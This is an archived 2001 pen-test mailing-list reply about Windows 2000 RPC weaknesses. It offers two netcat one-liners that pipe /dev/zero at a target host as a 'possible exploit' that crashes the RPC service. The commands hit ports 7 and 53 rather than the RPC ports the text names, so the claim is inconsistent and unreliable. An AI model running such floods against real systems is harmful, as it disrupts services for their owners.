Re: [PEN-TEST] RPC enumeration

From: Felix Huber (huberfelixat_private)
Date: Sun Apr 29 2001 - 03:46:53 PDT

  • Next message: Fred Mobach: "Re: [PEN-TEST] port 9200/udp scans (Print Lexmark)"

    > Hi list!
    > ....
    > finally...
    >
    >          3. Are there any RPC vulnerabilities out there? (besides denial
    of
    > service)
    >
    >
    > TIA!
    >
    > Steve
    
    Hi Steve,
    
    sorry for the late reply - just saw this Thread
    
    here is a possible exploit for the RPC Win2K Port:
    
    "nc target.host 7 < /dev/zero" for TCP or
    "nc -u target.host 53 < /dev/zero" for UDP
    
    Sending a specially malformed RPC packet via port 135-139 or 445 to a
    Windows 2000 server will halt the RPC service entirely.
    A reboot is required in order to regain normal functionality.
    
    
    Regards,
    Felix Huber
    
    
    -------------------------------------------------------
    Felix Huber, Web Application Programmer, Webtopia
    Guendlinger Str.2, 79241 Ihringen - Germany
    huberfelixat_private     (07668)  951 156 (phone)
    http://www.webtopia.de     (07668)  951 157 (fax)
                                             (01792)  205 724 (mobile)
    -------------------------------------------------------
    



    This archive was generated by hypermail 2b30 : Sun Apr 29 2001 - 07:40:50 PDT